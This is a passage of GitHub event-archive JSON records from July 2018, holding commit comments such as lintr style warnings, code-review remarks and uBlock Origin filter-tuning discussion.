1015-1034.}\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ssvd.R:107:1:](https://github.com/bwlewis/irlba/blob/d6a01a5dfc453cd3d39967bde242719ef79b0436/R/ssvd.R#L107) *style:* **Lines should not be more than 130 characters.**\n```r\n​#'   \\item{Witten, Tibshirani and Hastie (2009) A penalized matrix decomposition, with applications to sparse principal components and canonical correlation analysis. _Biostatistics_ 10(3): 515-534.}\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ssvd.R:201:51:](https://github.com/bwlewis/irlba/blob/d6a01a5dfc453cd3d39967bde242719ef79b0436/R/ssvd.R#L201) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​    lambda <<- vapply(seq(length(p)), function(j) (1 - alpha) * z[p[j], j] + alpha * z[p[j] + 1, j], pi, USE.NAMES=FALSE)\n                                                  ^\n```\n[R/ssvd.R:222:1:](https://github.com/bwlewis/irlba/blob/d6a01a5dfc453cd3d39967bde242719ef79b0436/R/ssvd.R#L222) *style:* **Lines should not be more than 130 characters.**\n```r\n​    s$u <- sweep(s$u, 2, apply(xsv, 2, function(x) sign(head(x[x!=0], 1))) / apply(s$u, 2, function(x) sign(head(x[x!=0], 1))), `*`)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2018-07-19T11:51:37Z"}
{"id":"7988656050","type":"CommitCommentEvent","actor":{"login":"lintr-bot"},"repo":{"name":"bwlewis/irlba"},"payload":{"comment":{"id":29763261,"position":null,"line":null,"path":null,"commit_id":"d6a01a5dfc453cd3d39967bde242719ef79b0436","created_at":"2018-07-19T11:51:39Z","updated_at":"2018-07-19T11:51:39Z","author_association":"NONE","body":"[R/irlba.R:132:1:](https://github.com/bwlewis/irlba/blob/d6a01a5dfc453cd3d39967bde242719ef79b0436/R/irlba.R#L132) *style:* **Lines should not be more than 130 characters.**\n```r\n​#' Baglama, James, and Lothar Reichel. \"Augmented implicitly restarted Lanczos bidiagonalization methods.\" SIAM Journal on Scientific Computing 27.1 (2005): 19-42.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ssvd.R:15:1:](https://github.com/bwlewis/irlba/blob/d6a01a5dfc453cd3d39967bde242719ef79b0436/R/ssvd.R#L15) *style:* **Lines should not be more than 130 characters.**\n```r\n​#' @param tol Convergence is determined when \\eqn{\\|U_j - U_{j-1}\\|_F < tol}{||U_j - U_{j-1}||_F < tol}, where \\eqn{U_j} is the matrix of estimated left regularized singular vectors at iteration \\eqn{j}.\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ssvd.R:106:1:](https://github.com/bwlewis/irlba/blob/d6a01a5dfc453cd3d39967bde242719ef79b0436/R/ssvd.R#L106) *style:* **Lines should not be more than 130 characters.**\n```r\n​#'   \\item{Shen, Haipeng, and Jianhua Z. Huang. \"Sparse principal component analysis via regularized low rank matrix approximation.\" Journal of multivariate analysis 99.6 (2008): 1015-1034.}\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ssvd.R:107:1:](https://github.com/bwlewis/irlba/blob/d6a01a5dfc453cd3d39967bde242719ef79b0436/R/ssvd.R#L107) *style:* **Lines should not be more than 130 characters.**\n```r\n​#'   \\item{Witten, Tibshirani and Hastie (2009) A penalized matrix decomposition, with applications to sparse principal components and canonical correlation analysis. _Biostatistics_ 10(3): 515-534.}\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/ssvd.R:201:51:](https://github.com/bwlewis/irlba/blob/d6a01a5dfc453cd3d39967bde242719ef79b0436/R/ssvd.R#L201) *style:* **Remove spaces before the left parenthesis in a function call.**\n```r\n​    lambda <<- vapply(seq(length(p)), function(j) (1 - alpha) * z[p[j], j] + alpha * z[p[j] + 1, j], pi, USE.NAMES=FALSE)\n                                                  ^\n```\n[R/ssvd.R:222:1:](https://github.com/bwlewis/irlba/blob/d6a01a5dfc453cd3d39967bde242719ef79b0436/R/ssvd.R#L222) *style:* **Lines should not be more than 130 characters.**\n```r\n​    s$u <- sweep(s$u, 2, apply(xsv, 2, function(x) sign(head(x[x!=0], 1))) / apply(s$u, 2, function(x) sign(head(x[x!=0], 1))), `*`)\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```"}},"created_at":"2018-07-19T11:51:39Z"}
{"id":"7988656910","type":"CommitCommentEvent","actor":{"login":"jadrum"},"repo":{"name":"jadrum/RestaurantManager"},"payload":{"comment":{"id":29763264,"position":46,"line":57,"path":"src/containers/login/register.js","commit_id":"6c2bb88847c10245a32cb689748ce4871f12a014","created_at":"2018-07-19T11:51:50Z","updated_at":"2018-07-19T11:51:50Z","author_association":"OWNER","body":"this function also does not to be within the submit function"}},"created_at":"2018-07-19T11:51:50Z"}
{"id":"7988658357","type":"CommitCommentEvent","actor":{"login":"rcarauta"},"repo":{"name":"rcarauta/website"},"payload":{"comment":{"id":29763268,"position":3,"line":3,"path":"README.md","commit_id":"e1e3301446f20925e01e99e1539da278c85a6830","created_at":"2018-07-19T11:52:10Z","updated_at":"2018-07-19T11:52:10Z","author_association":"OWNER","body":"Comment"}},"created_at":"2018-07-19T11:52:10Z"}
{"id":"7988658961","type":"CommitCommentEvent","actor":{"login":"rcarauta"},"repo":{"name":"rcarauta/website"},"payload":{"comment":{"id":29763271,"position":null,"line":null,"path":null,"commit_id":"e1e3301446f20925e01e99e1539da278c85a6830","created_at":"2018-07-19T11:52:18Z","updated_at":"2018-07-19T11:52:18Z","author_association":"OWNER","body":"Comment in commit"}},"created_at":"2018-07-19T11:52:18Z"}
{"id":"7988661449","type":"CommitCommentEvent","actor":{"login":"Christoph-Meyer"},"repo":{"name":"viadee/sonarQuest"},"payload":{"comment":{"id":29763277,"position":null,"line":null,"path":null,"commit_id":"75713caebd7792b4d3c022d580ec9ae4c7e356d4","created_at":"2018-07-19T11:52:49Z","updated_at":"2018-07-19T11:52:49Z","author_association":"CONTRIBUTOR","body":"Valid point. How would you change that?"}},"created_at":"2018-07-19T11:52:49Z"}
{"id":"7988661691","type":"CommitCommentEvent","actor":{"login":"ergomorphic"},"repo":{"name":"ScorexFoundation/sigmastate-interpreter"},"payload":{"comment":{"id":29763278,"position":64,"line":193,"path":"docs/wpaper/sigma.tex","commit_id":"d336e810d6cd106bb150479d59d696b75658edd9","created_at":"2018-07-19T11:52:52Z","updated_at":"2018-07-19T11:52:52Z","author_association":"COLLABORATOR","body":"@reyzin I wrote this some time ago, maybe some info can be used here https://github.com/ScorexFoundation/sigmastate-interpreter/blob/master/docs/LangSpec.md"}},"created_at":"2018-07-19T11:52:52Z"}
{"id":"7988665787","type":"CommitCommentEvent","actor":{"login":"ChaoLingW"},"repo":{"name":"ChaoLingW/HpJiNing"},"payload":{"comment":{"id":29763284,"position":null,"line":null,"path":null,"commit_id":"eb1d189b6c1cebed0fcd5a96dfa4419032a1a7f9","created_at":"2018-07-19T11:53:47Z","updated_at":"2018-07-19T11:53:47Z","author_association":"OWNER","body":"常用类 Date String Object"}},"created_at":"2018-07-19T11:53:47Z"}
{"id":"7988669365","type":"CommitCommentEvent","actor":{"login":"OtherCrashOverride"},"repo":{"name":"OtherCrashOverride/go-play"},"payload":{"comment":{"id":29763288,"position":null,"line":null,"path":null,"commit_id":"2f5462f283b576d8545ab6583cd4185b488e7572","created_at":"2018-07-19T11:54:33Z","updated_at":"2018-07-19T11:54:33Z","author_association":"OWNER","body":"FYI, I mistakenly though this was the sms emulator, not the gb emulator.  This codebase is not deprecated.\r\n\r\n\"An abstraction\" means that an internal log function should be implemented.  This internal function can then call printf, esp_log, write to a file, etc.\r\n"}},"created_at":"2018-07-19T11:54:33Z"}
{"id":"7988675700","type":"CommitCommentEvent","actor":{"login":"jadrum"},"repo":{"name":"jadrum/RestaurantManager"},"payload":{"comment":{"id":29763301,"position":64,"line":75,"path":"src/containers/login/register.js","commit_id":"6c2bb88847c10245a32cb689748ce4871f12a014","created_at":"2018-07-19T11:55:53Z","updated_at":"2018-07-19T11:55:53Z","author_association":"OWNER","body":"these two functions `finalPasswordValidation` and `finalEmailValidation` do not accept parameters, so you don't need to pass them the state. Or you could change the function to accept a parameter. Also the check for `error` for `finalEmailValidation` shouldn't be inside the parenthesis."}},"created_at":"2018-07-19T11:55:53Z"}
{"id":"7988678800","type":"CommitCommentEvent","actor":{"login":"jadrum"},"repo":{"name":"jadrum/RestaurantManager"},"payload":{"comment":{"id":29763305,"position":140,"line":179,"path":"src/containers/login/register.js","commit_id":"6c2bb88847c10245a32cb689748ce4871f12a014","created_at":"2018-07-19T11:56:33Z","updated_at":"2018-07-19T11:56:33Z","author_association":"OWNER","body":"you can remove commented out code"}},"created_at":"2018-07-19T11:56:33Z"}
{"id":"7988684066","type":"CommitCommentEvent","actor":{"login":"madmax765"},"repo":{"name":"AionGermany/aion-germany"},"payload":{"comment":{"id":29763313,"position":null,"line":null,"path":null,"commit_id":"a50c18feb9c641fd567d387df3caedc9f6e053d0","created_at":"2018-07-19T11:57:41Z","updated_at":"2018-07-19T11:57:41Z","author_association":"NONE","body":"OK thanks, I got it. But took a little work when I tried to apply SQL updates for the new table from June, 08 2018 - when applying this SQL. gave me an error. something on the line of - cant be null. So i made a new DB installed Clean 5.6 DB with all updates 30.06.18. copy the table player_events_window to my reg game DB, then applied the player_events_window14.07.2018.sql, Witch applied ok"}},"created_at":"2018-07-19T11:57:41Z"}
{"id":"7988685796","type":"CommitCommentEvent","actor":{"login":"sergeykuzin"},"repo":{"name":"sergeykuzin/gitTestRemote"},"payload":{"comment":{"id":29763318,"position":null,"line":null,"path":null,"commit_id":"29900dfdddbf9c78b44e291e584d27229939c8cc","created_at":"2018-07-19T11:58:04Z","updated_at":"2018-07-19T11:58:04Z","author_association":"OWNER","body":"Это видимо комментарии к коммитам"}},"created_at":"2018-07-19T11:58:04Z"}
{"id":"7988691967","type":"CommitCommentEvent","actor":{"login":"gorhill"},"repo":{"name":"uBlockOrigin/uAssets"},"payload":{"comment":{"id":29763332,"position":null,"line":null,"path":null,"commit_id":"23206100198dfdd3c789773e953a232e442bdc48","created_at":"2018-07-19T11:59:23Z","updated_at":"2018-07-19T11:59:23Z","author_association":"MEMBER","body":"> Is it possible?\r\n\r\nI guess, it's a matter of creating the proper scriptlet. I am willing to create scriptlets when they are likely to solve blocking issues on many sites."}},"created_at":"2018-07-19T11:59:23Z"}
{"id":"7988698961","type":"CommitCommentEvent","actor":{"login":"rickyzhang82"},"repo":{"name":"OtherCrashOverride/go-play"},"payload":{"comment":{"id":29763352,"position":null,"line":null,"path":null,"commit_id":"2f5462f283b576d8545ab6583cd4185b488e7572","created_at":"2018-07-19T12:00:49Z","updated_at":"2018-07-19T12:00:49Z","author_association":"NONE","body":"Regarding to your `abstraction`, that's what ESP_LOG facility for. See [here](http://esp-idf.readthedocs.io/en/latest/api-reference/system/log.html#logging-to-host-via-jtag). ESP_LOG can implement in different ways."}},"created_at":"2018-07-19T12:00:49Z"}
{"id":"7988699567","type":"CommitCommentEvent","actor":{"login":"pbortnik"},"repo":{"name":"reportportal/commons-dao"},"payload":{"comment":{"id":29763355,"position":14,"line":42,"path":"src/main/java/com/epam/ta/reportportal/entity/project/ProjectConfiguration.java","commit_id":"79a6271354400fab413db4f9cb093ae23382da85","created_at":"2018-07-19T12:00:56Z","updated_at":"2018-07-19T12:00:56Z","author_association":"CONTRIBUTOR","body":"i don't really think that we need to use this strategies. Now we are starting only with fixed calculation strategy."}},"created_at":"2018-07-19T12:00:56Z"}
{"id":"7988701795","type":"CommitCommentEvent","actor":{"login":"Rapotot"},"repo":{"name":"Rapotot/recipes"},"payload":{"comment":{"id":29763359,"position":null,"line":null,"path":null,"commit_id":"770c2fbe5aa8c547a7fa80ee4bb8cbfde1737ee4","created_at":"2018-07-19T12:01:23Z","updated_at":"2018-07-19T12:01:23Z","author_association":"OWNER","body":"Typo on row 10."}},"created_at":"2018-07-19T12:01:23Z"}
{"id":"7988701812","type":"CommitCommentEvent","actor":{"login":"rickyzhang82"},"repo":{"name":"OtherCrashOverride/go-play"},"payload":{"comment":{"id":29763360,"position":null,"line":null,"path":null,"commit_id":"2f5462f283b576d8545ab6583cd4185b488e7572","created_at":"2018-07-19T12:01:23Z","updated_at":"2018-07-19T12:01:23Z","author_association":"NONE","body":"Please explain your plan and branching strategy in wiki. It helps me send PR later. Thanks!"}},"created_at":"2018-07-19T12:01:23Z"}
{"id":"7988701824","type":"CommitCommentEvent","actor":{"login":"johngtait"},"repo":{"name":"docbook/xslt10-stylesheets"},"payload":{"comment":{"id":29763362,"position":null,"line":null,"path":null,"commit_id":"9ea40c449e22241605e3c3fc08980b4b9c2e409f","created_at":"2018-07-19T12:01:23Z","updated_at":"2018-07-19T12:01:23Z","author_association":"NONE","body":"Thank-you"}},"created_at":"2018-07-19T12:01:23Z"}
{"id":"7988703183","type":"CommitCommentEvent","actor":{"login":"Rapotot"},"repo":{"name":"Rapotot/recipes"},"payload":{"comment":{"id":29763364,"position":null,"line":null,"path":null,"commit_id":"770c2fbe5aa8c547a7fa80ee4bb8cbfde1737ee4","created_at":"2018-07-19T12:01:39Z","updated_at":"2018-07-19T12:01:39Z","author_association":"OWNER","body":"Typo."}},"created_at":"2018-07-19T12:01:39Z"}
{"id":"7988706077","type":"CommitCommentEvent","actor":{"login":"gorhill"},"repo":{"name":"uBlockOrigin/uAssets"},"payload":{"comment":{"id":29763367,"position":null,"line":null,"path":null,"commit_id":"23206100198dfdd3c789773e953a232e442bdc48","created_at":"2018-07-19T12:02:15Z","updated_at":"2018-07-19T12:02:15Z","author_association":"MEMBER","body":"> Also `||zmctrack.net^$xmlhttprequest,redirect=nooptext` does not work with Chrome, i.e. the redirection works but the layout of the site will be broken anyway.\r\n\r\nThat is the bug I was seeing above. The issue is when the filter is a pure hostname -- i.e. no path part. In such case, no redirection directive is created -- the code path to create redirect directives is not being taken -- this is unexpected, not by design. Anyways, fixed on my side, I will push to master soon."}},"created_at":"2018-07-19T12:02:15Z"}
{"id":"7988716670","type":"CommitCommentEvent","actor":{"login":"hua1995116"},"repo":{"name":"hua1995116/webchat"},"payload":{"comment":{"id":29763390,"position":null,"line":null,"path":null,"commit_id":"fe571c3d17b1a7429ee4c6d328074cbf74d64806","created_at":"2018-07-19T12:04:27Z","updated_at":"2018-07-19T12:04:27Z","author_association":"OWNER","body":"461249104"}},"created_at":"2018-07-19T12:04:27Z"}
{"id":"7988721652","type":"CommitCommentEvent","actor":{"login":"Christoph-Meyer"},"repo":{"name":"viadee/sonarQuest"},"payload":{"comment":{"id":29763404,"position":null,"line":null,"path":null,"commit_id":"75713caebd7792b4d3c022d580ec9ae4c7e356d4","created_at":"2018-07-19T12:05:31Z","updated_at":"2018-07-19T12:05:31Z","author_association":"CONTRIBUTOR","body":"We really do need a log entry telling us that some login communication between frontend and backend happened, so point (1) is out of question.\r\nPoint (2): this could only be logged when a DB request (thus, a backend-frontend comm) has already happened. This is just not enough information to validate if a request has really arrived.\r\n\r\nSo this leaves only Point (3) - logging the IP. This openes up two problems - first we would have to ask the user if that is okay (because this is personal data and as such protected) and second we currently do not track the IP address in the frontend.\r\n\r\nSo to summarize: only for the possibility of some user using a password accidentally as login in a game in a trusted environment the effort seems too much to me.\r\n\r\nDifferent idea: logging a hashcode of the username."}},"created_at":"2018-07-19T12:05:31Z"}
{"id":"7988724038","type":"CommitCommentEvent","actor":{"login":"instagibbs"},"repo":{"name":"kallewoof/elements"},"payload":{"comment":{"id":29763411,"position":6,"line":157,"path":"src/chainparams.cpp","commit_id":"b1fcfa341e5b45321169a89ee0694dabd245afca","created_at":"2018-07-19T12:06:02Z","updated_at":"2018-07-19T12:06:02Z","author_association":"NONE","body":"It throws exactly how you say. Feel free to PR a change."}},"created_at":"2018-07-19T12:06:02Z"}
{"id":"7988724084","type":"CommitCommentEvent","actor":{"login":"liujing2"},"repo":{"name":"intel/nemu"},"payload":{"comment":{"id":29763412,"position":null,"line":null,"path":null,"commit_id":"c1533ffec3d8bf329926cb93002815bed6c05eaf","created_at":"2018-07-19T12:06:02Z","updated_at":"2018-07-19T12:06:02Z","author_association":"COLLABORATOR","body":"@rbradford  Studied the codes and why we only set one situation for ioport_write function?\r\n+static void virt_cmos_ioport_write(void *opaque, hwaddr addr, uint64_t val,\r\n+                                  unsigned width)\r\n+{\r\n+    VirtCmosState *s = opaque;\r\n+\r\n+    s->cmos_index = val & 0x7f;\r\n+}"}},"created_at":"2018-07-19T12:06:02Z"}
{"id":"7988728201","type":"CommitCommentEvent","actor":{"login":"ashishrana160796"},"repo":{"name":"ashishrana160796/Concise-Interview-Prep"},"payload":{"comment":{"id":29763415,"position":null,"line":null,"path":null,"commit_id":"80b8992232aa7cd198c30ef23a60a8cbd8d4294f","created_at":"2018-07-19T12:06:55Z","updated_at":"2018-07-19T12:06:55Z","author_association":"OWNER","body":"Add it in reference section. Complete name & Author Name"}},"created_at":"2018-07-19T12:06:55Z"}
{"id":"7988729162","type":"CommitCommentEvent","actor":{"login":"ashishrana160796"},"repo":{"name":"ashishrana160796/Concise-Interview-Prep"},"payload":{"comment":{"id":29763419,"position":null,"line":null,"path":null,"commit_id":"80b8992232aa7cd198c30ef23a60a8cbd8d4294f","created_at":"2018-07-19T12:07:08Z","updated_at":"2018-07-19T12:07:08Z","author_association":"OWNER","body":"Thanks!"}},"created_at":"2018-07-19T12:07:08Z"}
{"id":"7988733563","type":"CommitCommentEvent","actor":{"login":"ashraysv131"},"repo":{"name":"ashraysv131/TrackFone"},"payload":{"comment":{"id":29763432,"position":null,"line":null,"path":null,"commit_id":"a33a7c002edd4e7a8696c57b3045df44479f41cf","created_at":"2018-07-19T12:08:02Z","updated_at":"2018-07-19T12:08:02Z","author_association":"OWNER","body":"From Master Branch : First Commit"}},"created_at":"2018-07-19T12:08:02Z"}
{"id":"7988734125","type":"CommitCommentEvent","actor":{"login":"ericholscher"},"repo":{"name":"rtfd/readthedocs.org"},"payload":{"comment":{"id":29763434,"position":27,"line":27,"path":"readthedocs/search/signals.py","commit_id":"ce4abaf9324f493a37b2549dce55dc4952228ad1","created_at":"2018-07-19T12:08:10Z","updated_at":"2018-07-19T12:08:10Z","author_association":"MEMBER","body":"Do we need this to be another Celery task? It's already running inside of Celery, so I'm not sure we need to `delay` it here. It could lead to weird race conditions if it got queued up for a long time. "}},"created_at":"2018-07-19T12:08:10Z"}
{"id":"7988734566","type":"CommitCommentEvent","actor":{"login":"ashraysv131"},"repo":{"name":"ashraysv131/TrackFone"},"payload":{"comment":{"id":29763435,"position":null,"line":null,"path":null,"commit_id":"a33a7c002edd4e7a8696c57b3045df44479f41cf","created_at":"2018-07-19T12:08:15Z","updated_at":"2018-07-19T12:08:15Z","author_association":"OWNER","body":"First Commit : Master Branch"}},"created_at":"2018-07-19T12:08:15Z"}
{"id":"7988739864","type":"CommitCommentEvent","actor":{"login":"davidhughhenrymack"},"repo":{"name":"Octavian-ai/mac-graph"},"payload":{"comment":{"id":29763448,"position":19,"line":18,"path":"mac-graph/cell/memory_cell.py","commit_id":"eeb9b8634b1da7ff0341331bcf2fcc9cc609a0e4","created_at":"2018-07-19T12:09:24Z","updated_at":"2018-07-19T12:09:24Z","author_association":"CONTRIBUTOR","body":"flag"}},"created_at":"2018-07-19T12:09:24Z"}
{"id":"7988740243","type":"CommitCommentEvent","actor":{"login":"titouancreach"},"repo":{"name":"titouancreach/web-config-generator"},"payload":{"comment":{"id":29763449,"position":12,"line":12,"path":"web_config_generator/webpack.cljs","commit_id":"2ec34f1fd17304bf28962b07422574b170621d95","created_at":"2018-07-19T12:09:29Z","updated_at":"2018-07-19T12:09:29Z","author_association":"OWNER","body":"nice indent"}},"created_at":"2018-07-19T12:09:29Z"}
{"id":"7988741127","type":"CommitCommentEvent","actor":{"login":"davidhughhenrymack"},"repo":{"name":"Octavian-ai/mac-graph"},"payload":{"comment":{"id":29763451,"position":21,"line":16,"path":"mac-graph/cell/memory_cell.py","commit_id":"eeb9b8634b1da7ff0341331bcf2fcc9cc609a0e4","created_at":"2018-07-19T12:09:40Z","updated_at":"2018-07-19T12:09:40Z","author_association":"CONTRIBUTOR","body":"flag"}},"created_at":"2018-07-19T12:09:40Z"}
{"id":"7988741576","type":"CommitCommentEvent","actor":{"login":"davidhughhenrymack"},"repo":{"name":"Octavian-ai/mac-graph"},"payload":{"comment":{"id":29763452,"position":24,"line":19,"path":"mac-graph/cell/memory_cell.py","commit_id":"eeb9b8634b1da7ff0341331bcf2fcc9cc609a0e4","created_at":"2018-07-19T12:09:46Z","updated_at":"2018-07-19T12:09:46Z","author_association":"CONTRIBUTOR","body":"flag"}},"created_at":"2018-07-19T12:09:46Z"}
{"id":"7988744412","type":"CommitCommentEvent","actor":{"login":"Annchous"},"repo":{"name":"StasKuzichev/android_test_project"},"payload":{"comment":{"id":29763458,"position":null,"line":null,"path":null,"commit_id":"4d4deba9b0ca63504c5d056e05b561254ec8e7f9","created_at":"2018-07-19T12:10:22Z","updated_at":"2018-07-19T12:10:22Z","author_association":"COLLABORATOR","body":"good job\r\n"}},"created_at":"2018-07-19T12:10:22Z"}
{"id":"7988746044","type":"CommitCommentEvent","actor":{"login":"davidhughhenrymack"},"repo":{"name":"Octavian-ai/mac-graph"},"payload":{"comment":{"id":29763460,"position":18,"line":73,"path":"mac-graph/cell/read_cell.py","commit_id":"eeb9b8634b1da7ff0341331bcf2fcc9cc609a0e4","created_at":"2018-07-19T12:10:42Z","updated_at":"2018-07-19T12:10:42Z","author_association":"CONTRIBUTOR","body":"flag"}},"created_at":"2018-07-19T12:10:42Z"}
{"id":"7988749575","type":"CommitCommentEvent","actor":{"login":"okiehsch"},"repo":{"name":"uBlockOrigin/uAssets"},"payload":{"comment":{"id":29763476,"position":null,"line":null,"path":null,"commit_id":"23206100198dfdd3c789773e953a232e442bdc48","created_at":"2018-07-19T12:11:25Z","updated_at":"2018-07-19T12:11:25Z","author_association":"CONTRIBUTOR","body":"If I add `||zmctrack.net/z$xmlhttprequest,redirect=nooptext,domain=en.bookfi.net` instead, the layout of\r\n`http://en.bookfi.net/s/?q=Discrete-Event+System+Simulation&t=0` is still broken."}},"created_at":"2018-07-19T12:11:25Z"}
{"id":"7988753106","type":"CommitCommentEvent","actor":{"login":"guhe283"},"repo":{"name":"guhe283/test"},"payload":{"comment":{"id":29763488,"position":null,"line":null,"path":null,"commit_id":"4941341c9d9e1de39e61cf43fce0a722edac03be","created_at":"2018-07-19T12:12:09Z","updated_at":"2018-07-19T12:12:09Z","author_association":"OWNER","body":"w"}},"created_at":"2018-07-19T12:12:09Z"}
{"id":"7988762611","type":"CommitCommentEvent","actor":{"login":"ddt-mentor"},"repo":{"name":"ddtBeppu/introPython3_beppu"},"payload":{"comment":{"id":29763503,"position":21,"line":21,"path":"e10/e10_06.py","commit_id":"af6317eadfd0f56d48816eb2294f55cb25a61414","created_at":"2018-07-19T12:14:07Z","updated_at":"2018-07-19T12:14:07Z","author_association":"COLLABORATOR","body":"浅田\r\n何の為のメッセージかをコメントに追記してください。"}},"created_at":"2018-07-19T12:14:07Z"}
{"id":"7988764811","type":"CommitCommentEvent","actor":{"login":"dosowen"},"repo":{"name":"dosowen/chat"},"payload":{"comment":{"id":29763507,"position":null,"line":null,"path":null,"commit_id":"8a4459291dc9ddc5e2e744681dcdf1eb2b7d78e6","created_at":"2018-07-19T12:14:36Z","updated_at":"2018-07-19T12:14:36Z","author_association":"OWNER","body":"WOW"}},"created_at":"2018-07-19T12:14:36Z"}
{"id":"7988770105","type":"CommitCommentEvent","actor":{"login":"Rapotot"},"repo":{"name":"Rapotot/recipes"},"payload":{"comment":{"id":29763522,"position":5,"line":10,"path":"cake-recipe.txt","commit_id":"770c2fbe5aa8c547a7fa80ee4bb8cbfde1737ee4","created_at":"2018-07-19T12:15:40Z","updated_at":"2018-07-19T12:15:40Z","author_association":"OWNER","body":"Typo on line 10, testing inline commenting."}},"created_at":"2018-07-19T12:15:40Z"}
{"id":"7988775088","type":"CommitCommentEvent","actor":{"login":"lainverse"},"repo":{"name":"uBlockOrigin/uAssets"},"payload":{"comment":{"id":29763536,"position":null,"line":null,"path":null,"commit_id":"23206100198dfdd3c789773e953a232e442bdc48","created_at":"2018-07-19T12:16:39Z","updated_at":"2018-07-19T12:16:39Z","author_association":"NONE","body":"> I guess, it's a matter of creating the proper scriptlet. I am willing to add scriptlets to uBO when they are likely to solve blocking issues on many sites.\r\n\r\nThere are quite a lot of sites which are using `zmctrack.net` and similar, so some solution is needed. If redirect will be enough then so be it, but if not, then scriptlet is needed to stall their code.\r\nHowever, I'd like to point out that in some cases they are running their script right from the document header as data-url (`<script src=\"data:...\"></script>`) and attempting to store pointers to clean versions of `XMLHttpRequest` methods and a few other functions like `window.stop` (looks like they know about RU AdList JS Fixes). So far my script doesn't help when trick with data-url in the header is used since my code runs after their's. Make sure you inject your code before they have chance to run theirs.\r\nExample: view-source:https://ua.sinoptik.ua/"}},"created_at":"2018-07-19T12:16:39Z"}
{"id":"7988775667","type":"CommitCommentEvent","actor":{"login":"ngeiswei"},"repo":{"name":"opencog/as-moses"},"payload":{"comment":{"id":29763537,"position":null,"line":null,"path":null,"commit_id":"5d17521f92893cbcbfaa8a6ae9bf2a47c60ad506","created_at":"2018-07-19T12:16:46Z","updated_at":"2018-07-19T12:16:46Z","author_association":"MEMBER","body":"I don't think you need to bother with that for now, simply convert the reduced combo program to atomese, using the code in https://github.com/opencog/as-moses/blob/master/moses/comboreduct/converter/combo_atomese.h\r\n\r\nThat is, as you implement the `atomese_based_scorer` convert the combo tree to atomese, that combo tree will likely already be reduced (depending on the parameters) and that's all your need. Reread carefully Section Replace Combo by Atomese Interpreter in Fitness Evaluation of issue #3 that should hopefully be clear (let me know otherwise)."}},"created_at":"2018-07-19T12:16:46Z"}
{"id":"7988779404","type":"CommitCommentEvent","actor":{"login":"gobomb"},"repo":{"name":"AliyunContainerService/log-pilot"},"payload":{"comment":{"id":29763541,"position":null,"line":null,"path":null,"commit_id":"0769342331c087cb250c5d5997a1605ca110c104","created_at":"2018-07-19T12:17:33Z","updated_at":"2018-07-19T12:17:33Z","author_association":"NONE","body":"good"}},"created_at":"2018-07-19T12:17:33Z"}
{"id":"7988780773","type":"CommitCommentEvent","actor":{"login":"gorhill"},"repo":{"name":"uBlockOrigin/uAssets"},"payload":{"comment":{"id":29763543,"position":null,"line":null,"path":null,"commit_id":"23206100198dfdd3c789773e953a232e442bdc48","created_at":"2018-07-19T12:17:51Z","updated_at":"2018-07-19T12:17:51Z","author_association":"MEMBER","body":"@okiehsch I see the redirection being taken in the logger, so the issue is something else than uBO, possibly the timing trick spotted by @lainverse used on that site?"}},"created_at":"2018-07-19T12:17:51Z"}
{"id":"7988781203","type":"CommitCommentEvent","actor":{"login":"h-huss"},"repo":{"name":"viadee/sonarQuest"},"payload":{"comment":{"id":29763547,"position":null,"line":null,"path":null,"commit_id":"75713caebd7792b4d3c022d580ec9ae4c7e356d4","created_at":"2018-07-19T12:17:56Z","updated_at":"2018-07-19T12:17:56Z","author_association":"CONTRIBUTOR","body":"You are right, its too much work.\r\n\r\nLogging the hashcode would require calculating it in the client.\r\n\r\nAnother solution might be to add a UUID to each login request, and logging it on both sides.\r\n"}},"created_at":"2018-07-19T12:17:56Z"}
